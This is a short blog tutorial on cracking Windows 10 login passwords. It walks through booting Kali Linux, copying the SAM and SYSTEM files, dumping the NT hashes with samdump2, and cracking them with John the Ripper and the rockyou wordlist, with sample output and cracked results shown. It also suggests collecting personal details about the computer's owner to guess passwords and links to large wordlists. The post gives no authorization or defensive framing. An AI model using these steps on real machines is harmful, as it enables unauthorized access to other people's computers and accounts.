Posted: . At: 12:50 PM. This was 8 years ago. Post ID: 8813
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.


Cracking Windows 10 passwords with john the ripper on Kali Linux 2016.

by

Break Windows 10 password hashes with Kali Linux and John the Ripper

Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.

Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.

Then dump the password hashes.

root@kali:~/Desktop# samdump2 SYSTEM SAM -o out

Now grab the rockyou.txt wordlist.

root@kali:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt

Now I am attempting to crack the Windows user password.

root@kali:~/Desktop# john out -format=nt -wordlist rock.txt

If this is successful, this output should be printed, or something like this…

root@kali:~/Desktop# john out -format=nt -wordlist rock.txt 
Warning: invalid UTF-8 seen reading rock.txt
Using default input encoding: UTF-8
Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         ()
                 (*disabled* Administrator)
2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now cat the john.pot file, this should contain cracked passwords.

root@kali:~/Desktop# cat ~/.john/john.pot 
$NT$8846f7eaee8fb117ad06bdd830b7586c:password
$NT$31d6cfe0d16ae931b73c59d7e0c089c0:

If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one😳.

There is a directory here, this contains a few very large wordlists.

https://download.g0tmi1k.com/wordlists/large/.

https://www.renderlab.net/projects/WPA-tables/. Giant 33GB WPA PSK wordlists. Should also be good for cracking passwords.


Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.